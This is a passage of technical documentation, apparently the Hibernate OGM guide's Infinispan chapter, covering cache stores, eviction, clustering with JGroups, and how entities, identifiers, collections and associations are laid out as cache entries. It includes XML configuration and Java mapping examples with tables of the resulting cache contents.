are several strategies to play with,\nfor now let's just consider you'll likely need one to avoid running out of memory\nwhen storing too many entries in the bounded JVM memory space;\nof course you don't need to choose one while experimenting with limited data sizes:\nenabling such a strategy doesn't have any other impact\nin the functionality of your Hibernate OGM application\n(other than performance: entries stored in the Infinispan in-memory space\nis accessed much quicker than from any CacheStore).\n\nA `CacheStore` can be configured as write-through,\ncommitting all changes to the `CacheStore` before returning (and in the same transaction)\nor as write-behind.\nA write-behind configuration is normally not encouraged in storage engines,\nas a failure of the node implies some data might be lost\nwithout receiving any notification about it,\nbut this problem is mitigated in Infinispan because of its capability\nto combine CacheStore write-behind\nwith a synchronous replication to other Infinispan nodes.\n\n.Enabling a FileCacheStore and eviction\n====\n\n\n[source, XML]\n----\n<local-cache name=\"User\">\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <eviction strategy=\"LIRS\" max-entries=\"2000\"\/>\n <persistence passivation=\"true\">\n <file-store\n shared=\"false\"\n path=\"\/var\/infinispan\/myapp\/users\">\n <write-behind flush-lock-timeout=\"15000\" thread-pool-size=\"5\" \/>\n <\/file-store>\n <\/persistence>\n<\/local-cache>\n----\n\n====\n\nIn this example we enabled both `eviction` and a `CacheStore` (the `persistence` element).\n`LIRS` is one of the choices we have for eviction strategies.\nHere it is configured to keep (approximately) 2000 entries in live memory\nand evict the remaining as a memory usage control strategy.\n\nThe `CacheStore` is enabling `passivation`,\nwhich means that the entries which are evicted are stored on the filesystem.\n\n[WARNING]\n====\nYou could configure an eviction strategy while not configuring a passivating CacheStore!\nThat is a valid configuration for Infinispan but will have the evictor permanently remove entries.\nHibernate OGM will break in such a configuration.\n====\n\n[[ogm-infinispan-clustering]]\n\n==== Clustering: store data on multiple Infinispan nodes\n\nThe best thing about Infinispan is that all nodes are treated equally\nand it requires almost no beforehand capacity planning:\nto add more nodes to the cluster you just have to start new JVMs,\non the same or different physical servers,\nhaving your same Infinispan configuration and your same application.\n\nInfinispan supports several clustering _cache modes_;\neach mode provides the same API and functionality\nbut with different performance, scalability and availability options:\n\n.Infinispan cache modes\nlocal::\nUseful for a single VM: networking stack is disabled\nreplication::\nAll data is replicated to each node;\neach node contains a full copy of all entries.\nConsequentially reads are faster but writes don't scale as well.\nNot suited for very large datasets.\ndistribution::\nEach entry is distributed on multiple nodes for redundancy and failure recovery,\nbut not to all the nodes.\nProvides linear scalability for both write and read operations.\ndistribution is the default mode.\n\nTo use the `replication` or `distribution` cache modes\nInfinispan will use JGroups to discover and connect to the other nodes.\n\nIn the default configuration,\nJGroups will attempt to autodetect peer nodes using a multicast socket;\nthis works out of the box in the most network environments\nbut will require some extra configuration in cloud environments\n(which often block multicast packets) or in case of strict firewalls.\nSee the http:\/\/www.jgroups.org\/manual\/html_single\/[JGroups reference documentation],\nspecifically look for _Discovery Protocols_ to customize the detection of peer nodes.\n\nNowadays, the [acronym]`JVM` defaults to use [acronym]`IPv6` network stack;\nthis will work fine with JGroups, but only if you configured [acronym]`IPv6` correctly.\nIt is often useful to force the [acronym]`JVM` to use [acronym]`IPv4`.\n\nIt is also important to let JGroups know which networking interface you want to use;\nit will bind to one interface by default, but if you have multiple network interfaces\nthat might not be the one you expect.\n\n.JVM properties to set for clustering\n====\n[source]\n----\n#192.168.122.1 is an example IPv4 address\n-Djava.net.preferIPv4Stack=true -Djgroups.bind_addr=192.168.122.1\n----\n====\n\n[NOTE]\n====\nYou don't need to use [acronym]`IPv4`: JGroups is compatible with [acronym]`IPv6`\nprovided you have routing properly configured and valid addresses assigned.\n\nThe `jgroups.bind_addr` needs to match a placeholder name\nin your JGroups configuration in case you don't use the default one.\n====\n\nThe default configuration uses `distribution` as cache mode\nand uses the `jgroups-tcp.xml` configuration for JGroups,\nwhich is contained in the Infinispan jar\nas the default configuration for Infinispan users.\nLet's see how to reconfigure this:\n\n.Reconfiguring cache mode and override JGroups configuration\n====\n[source, XML]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<infinispan\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"urn:infinispan:config:9.1 http:\/\/www.infinispan.org\/schemas\/infinispan-config-9.1.xsd\"\n xmlns=\"urn:infinispan:config:9.1\">\n\n <jgroups>\n <stack-file name=\"custom-stack\" path=\"my-jgroups-conf.xml\" \/>\n <\/jgroups>\n\n <cache-container name=\"HibernateOGM\" default-cache=\"DEFAULT\">\n <transport stack=\"custom-stack\" \/>\n\n <!-- *************************************** -->\n <!-- Default cache used as template -->\n <!-- *************************************** -->\n <distributed-cache name=\"DEFAULT\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <!-- Override the cache mode: -->\n <replicated-cache name=\"User\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/replicated-cache>\n\n <distributed-cache name=\"Order\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <distributed-cache name=\"associations_User_Order\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <\/cache-container>\n\n<\/infinispan>\n----\n====\n\nIn the example above we specify a custom JGroups configuration file\nand set the cache mode for the default cache to `distribution`;\nthis is going to be inherited by the `Order` and the `associations_User_Order` caches.\nBut for `User` we have chosen (for the sake of this example) to use `replication`.\n\nNow that you have clustering configured, start the service on multiple nodes.\nEach node will need the same configuration and jars.\n\n[TIP]\n====\nWe have just shown how to override the clustering mode\nand the networking stack for the sake of completeness, but you don't have to!\n\nStart with the default configuration and see if that fits you.\nYou can fine tune these setting when you are closer to going in production.\n====\n\n[[ogm-infinispan-storage-principles]]\n==== Storage principles\n\nTo describe things simply, each entity is stored under a single key.\nThe value itself is a map containing the columns \/ values pair.\n\nEach association from one entity instance to (a set of) another is stored under a single key.\nThe value contains the navigational information to the (set of) entity.\n\n[[ogm-infinispan-built-in-types]]\n===== Properties and built-in types\n\nEach entity is represented by a map.\nEach property or more precisely column is represented by an entry in this map,\nthe key being the column name.\n\nHibernate OGM support by default the following property types:\n\n* `java.lang.String`\n* `java.lang.Character` (or char primitive)\n* `java.lang.Boolean` (or boolean primitive); Optionally the annotations `@Type(type = \"true_false\")`, `@Type(type = \"yes_no\")` and `@Type(type = \"numeric_boolean\")` can be used to map boolean properties to the characters 'T'\/'F', 'Y'\/'N' or the int values 0\/1, respectively.\n* `java.lang.Byte` (or byte primitive)\n* `java.lang.Short` (or short primitive)\n* `java.lang.Integer` (or integer primitive)\n* `java.lang.Long` (or long primitive)\n* `java.lang.Integer` (or integer primitive)\n* `java.lang.Float` (or float primitive)\n* `java.lang.Double` (or double primitive)\n\n* `java.math.BigDecimal`\n* `java.math.BigInteger`\n\n* `java.util.Calendar`\n* `java.util.Date`\n* `java.util.UUID`\n* `java.util.URL`\n\n[NOTE]\n====\nHibernate OGM doesn't store null values in Infinispan,\nsetting a value to null is the same as removing the corresponding entry\nfrom Infinispan.\n\nThis can have consequences when it comes to queries on null value.\n====\n\n===== Identifiers\n\nEntity identifiers are used to build the key in which the entity is stored in the cache.\n\nThe key is comprised of the following information:\n\n* the identifier column names\n* the identifier column values\n* the entity table (for the `CACHE_PER_KIND` strategy)\n\nIn `CACHE_PER_TABLE`, the table name is inferred from the cache name.\nIn `CACHE_PER_KIND`, the table name is necessary to identify the entity in the generic cache.\n\n.Define an identifier as a primitive type\n====\n[source, JAVA]\n----\n@Entity\npublic class Bookmark {\n\n @Id\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Bookmark` cache in `CACHE_PER_TABLE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [42] | id | 42 \n | title | \"Hibernate OGM documentation\" \n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| \"Bookmark\", [\"id\"], [42] | id | 42 \n | title | \"Hibernate OGM documentation\" \n|===\n====\n\n.Define an identifier using @EmbeddedId\n====\n[source, JAVA]\n----\n@Embeddable\npublic class NewsID implements Serializable {\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n private String content;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache in `CACHE_PER_TABLE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY\n 2+^| MAP ENTRIES\n\n.3+^.^| [newsId.author, newsId.title], [\"Guillaume\", \"How to use Hibernate OGM ?\"]\n | newsId.author | \"Guillaume\"\n\n | newsId.title | \"How to use Hibernate OGM ?\"\n\n | content | \"Simple, just like ORM but with a NoSQL database\"\n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY\n 2+^| MAP ENTRIES\n\n.3+^.^| \"News\", [newsId.author, newsId.title], [\"Guillaume\", \"How to use Hibernate OGM ?\"]\n | newsId.author | \"Guillaume\"\n\n | newsId.title | \"How to use Hibernate OGM ?\"\n\n | content | \"Simple, just like ORM but with a NoSQL database\"\n|===\n====\n\n====== Identifier generation strategies\n\nSince Infinispan has not native sequence nor identity column support,\nthese are simulated using the table strategy, however their default values vary.\nWe highly recommend you explicitly use a `TABLE` strategy if you want to generate a monotonic identifier.\n\nBut if you can, use a pure in-memory and scalable strategy like a UUID generator.\n\n.Id generation strategy TABLE using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE)\n private long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n\n----\n\n.Content of the `hibernate_sequences` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"sequence_name\"], [\"default\"]\n^.^| 2\n|===\n\n.Content of the IDENTIFIERS cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"hibernate_sequences\", [\"sequence_name\"], [\"default\"]\n^.^| 2\n|===\n====\n\nAs you can see, in `CACHE_PER_TABLE`, the key does not contain the id source table name.\nIt is inferred by the cache name hosting that key.\n\n.Id generation strategy TABLE using a custom table\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE, generator = \"guitarGen\")\n @TableGenerator(\n name = \"guitarGen\",\n table = \"GuitarPlayerSequence\",\n pkColumnName = \"seq\"\n pkColumnValue = \"guitarPlayer\",\n )\n private long id;\n\n \/\/ getters, setters ...\n}\n\n----\n\n.Content of the `GuitarPlayerSequence` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"seq\"], [\"guitarPlayer\"]\n^.^| 2\n|===\n\n.Content of the IDENTIFIERS cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"GuitarPlayerSequence\", [\"seq\"], [\"guitarPlayer\"]\n^.^| 2\n|===\n====\n\n.SEQUENCE id generation strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"songSequenceGenerator\")\n @SequenceGenerator(\n name = \"songSequenceGenerator\",\n sequenceName = \"song_sequence\",\n initialValue = 2,\n allocationSize = 20\n )\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `hibernate_sequences` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"sequence_name\"], [\"song_sequence\"]\n^.^| 11\n|===\n\n.Content of the `IDENTIFIERS` cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"hibernate_sequences\", \"[\"sequence_name\"], [\"song_sequence\"]\n^.^| 11\n|===\n====\n\n===== Entities\n\nEntities are stored in the cache named after the entity name when using the `CACHE_PER_TABLE` strategy.\nIn the `CACHE_PER_KIND` strategy, entities are stored in a single cache named `ENTITIES`.\n\nThe key is comprised of the following information:\n\n* the identifier column names\n* the identifier column values\n* the entity table (for the `CACHE_PER_KIND` strategy)\n\nIn `CACHE_PER_TABLE`, the table name is inferred from the cache name.\nIn `CACHE_PER_KIND`, the table name is necessary to identify the entity in the generic cache.\n\nThe entry value is an instance of `org.infinispan.atomic.FineGrainedMap` \nwhich contains all the entity properties -\nor to be specific columns.\nEach column name and value is stored as a key \/ value pair in the map.\nWe use this specialized map as Infinispan is able to transport changes\nin a much more efficient way.\n\n.Default JPA mapping for an entity\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache in `CACHE_PER_TYPE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| \"News\", [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n|===\n====\n\nAs you can see, the table name is not part of the key for `CACHE_PER_TYPE`.\nIn the rest of this section we will no longer show the `CACHE_PER_KIND` strategy.\n\n.Rename field and collection using @Table and @Column\n====\n[source, JAVA]\n----\n@Entity\n@Table(name = \"Article\")\npublic class News {\n\n @Id\n private String id;\n\n @Column(name = \"headline\")\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Article` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | headline | \"On the merits of NoSQL\" \n|===\n====\n\n====== Embedded objects and collections\n\n.Embedded object\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n @Embedded\n private NewsPaper paper;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class NewsPaper {\n\n private String name;\n private String owner;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.4+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n | paper.name | \"NoSQL journal of prophecies\" \n | paper.owner | \"Delphy\" \n|===\n====\n\n.@ElementCollection with one attribute\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `GrandMother` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"id\"], [\"granny\"] | id | \"granny\"\n|===\n\n.Content of the `associations_GrandMother_grandChildren` cache in `CACHE_PER_TYPE`\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.4+^.^| [\"GrandMother_id\"], [\"granny\"]\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Leia\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Leia\"\n\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Luke\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Luke\"\n|===\n\n.Content of the `ASSOCIATIONS` cache in `CACHE_PER_KIND`\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.4+^.^| \"GrandMother_grandChildren\", [\"GrandMother_id\"], [\"granny\"]\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Leia\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Leia\"\n\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Luke\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Luke\"\n|===\n====\n\nHere, we see that the collection of elements is stored in a separate cache and entry.\nThe association key is made of:\n\n* the foreign key column names pointing to the owner of this association\n* the foreign key column values pointing to the owner of this association\n* the association table name in the `CACHE_PER_KIND` approach where all associations share the same cache\n\nThe association entry is a map containing the representation of each entry in the collection.\nThe keys of that map are made of:\n\n* the names of the columns uniquely identifying that specific collection entry\n (e.g. for a `Set` this is all of the columns)\n* the values of the columns uniquely identifying that specific collection entry\n\nThe value attack to that collection entry key is a Map containing the key value pairs column name \/ column value.\n\n.@ElementCollection with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n @OrderColumn( name = \"birth_order\" )\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `GrandMother` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"id\"], [\"granny\"] | id | \"granny\"\n|===\n\n.Content of the `GrandMother_grandChildren` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.6+^.^| [\"GrandMother_id\"], [\"granny\"]\n.3+^.^| [\"GrandMother_id\", \"birth_order\"], [\"granny\", 0]\n | GrandMother_id\n | \"granny\"\n\n | birth_order\n | 0\n\n | name\n | \"Leia\"\n\n.3+^.^| [\"GrandMother_id\", \"birth_order\"], [\"granny\", 1]\n | GrandMother_id\n | \"granny\"\n\n | birth_order\n | 1\n\n | name\n | \"Luke\"\n|===\n====\n\nHere we used an indexed collection and to identify the entry in the collection,\nonly the owning entity id and the index value is enough.\n\n.@ElementCollection with Map of @Embeddable\n====\n[source, JAVA]\n----\n@Entity\npublic class ForumUser {\n\n\t@Id\n\tprivate String name;\n\n\t@ElementCollection\n\tprivate Map<String, JiraIssue> issues = new HashMap<>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class JiraIssue {\n\n\tprivate Integer number;\n\tprivate String project;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `ForumUser` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"id\"], [\"Jane Doe\"] | id | \"Jane Doe\"\n|===\n\n.Content of the `ForumUser_issues` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.12+^.^| [\"ForumUser_id\"], [\"Jane Doe\"]\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issueWithNull\"]\n\n | ForumUser_id\n | Jane Doe\n\n | issue_KEY\n | \"issueWithNull\"\n\n | issues.value.project\n | <null>\n\n | issues.value.number\n | <null>\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issue1\"]\n\n | ForumUser_id\n | \"Jane Doe\"\n\n | issue_KEY\n | \"issue1\"\n\n | issues.value.project\n | \"OGM\"\n\n | issues.value.number\n | 1253\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issue2\"]\n\n | ForumUser_id\n | \"Jane Doe\"\n\n | issue_KEY\n | \"issue2\"\n\n | issues.value.project\n | \"HSEARCH\"\n\n | issues.value.number\n | 2000\n|===\n====\n\n===== Associations\n\nAssociations between entities are mapped like (collection of) embeddables \nexcept that the target entity is represented by its identifier(s).\n\n\n.Unidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicule` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | \"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.3+^.^| [\"id\"], [\"W001\"] | id | \"W001\"\n | diameter | 0.0\n | vehicule_id | \"V_01\"\n|===\n====\n\n[[infinispan-in-entity-one-to-one-join-column]]\n.Unidirectional one-to-one with @JoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @JoinColumn( name = \"part_of\" )\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicle` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | \"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.3+^.^| \"Wheel\", [\"id\"], [\"W001\"] | id | \"W001\"\n | diameter | 0.0\n | part_of | \"V_01\"\n|===\n====\n\n.Unidirectional one-to-one with @MapsId and @PrimaryKeyJoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @PrimaryKeyJoinColumn\n @MapsId\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicle` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | \"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"vehicule_id\"], [\"V_01\"] | vehicule_id | \"V_01\"\n | diameter | 0.0\n|===\n====\n\n.Bidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Husband {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Wife wife;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wife {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne(mappedBy=\"wife\")\n private Husband husband;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Husband` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"id\"], [\"alex\"] | id | \"alex\"\n | name | \"Alex\"\n | wife | \"bea\"\n|===\n\n.Content of the `Wife` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"bea\"] | id | \"bea\"\n | name | \"Bea\"\n|===\n\n.Content of the `associations_Husband` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.2+^.^| [\"wife\"], [\"bea\"]\n.2+^.^| [\"id\", \"wife\"], [\"alex\", \"bea\"]\n | id\n | \"alex\"\n\n | wife\n | \"bea\"\n|===\n====\n\n.Unidirectional one-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"davide_basket\"] | id | \"davide_basket\"\n | owner | \"Davide\"\n|===\n\n.Content of the `Product` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"name\"], [\"Beer\"] | name | \"Beer\"\n | description | \"Tactical Nuclear Penguin\"\n\n.2+^.^| [\"name\"], [\"Pretzel\"] | name | \"Pretzel\"\n | description | \"Glutino Pretzel Sticks\"\n|===\n\n.Content of the `associations_Basket_Product` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"Basket_id\"], [\"davide_basket\"]\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Beer\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Beer\"\n\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Pretzel\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Pretzel\"\n\n\n|===\n====\n\n.Unidirectional one-to-many with `@JoinTable`\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n @JoinTable( name = \"BasketContent\" )\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"davide_basket\"] | id | \"davide_basket\"\n | owner | \"Davide\"\n|===\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"name\"], [\"Beer\"] | name | \"Beer\"\n | description | \"Tactical Nuclear Penguin\"\n\n.2+^.^| [\"name\"], [\"Pretzel\"] | name | \"Pretzel\"\n | description | \"Glutino Pretzel Sticks\"\n|===\n\n.Content of the `associations_BasketContent` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"Basket_id\"], [\"davide_basket\"]\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Beer\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Beer\"\n\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Pretzel\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Pretzel\"\n|===\n====\n\n.Unidirectional one-to-many using maps with defaults\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `User` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n ^.^| [\"id\"], [\"user_001\"] | id | \"user_001\"\n|===\n\n.Content of the `Address` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"address_001\"] | id | \"address_001\"\n | city | \"Rome\"\n\n.2+^.^| [\"id\"], [\"address_002\"] | id | \"address_002\"\n | city | \"Paris\"\n|===\n\n\n.Content of the `associations_User_address` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.6+^.^| [\"User_id\"], \"user_001\"]\n.3+^.^| [\"User_id\", \"addresses_KEY\"], [\"user_001\", \"home\"]\n | User_id\n | \"user_001\"\n\n | addresses_KEY\n | \"home\"\n\n | addresses_id\n | \"address_001\"\n\n\n.3+^.^| [\"User_id\", \"addresses_KEY\"], [\"user_001\", \"work\"]\n | User_id\n | \"user_002\"\n\n | addresses_KEY\n | \"work\"\n\n | addresses_id\n | \"address_002\"\n|===\n====\n\n.Unidirectional one-to-many using maps with 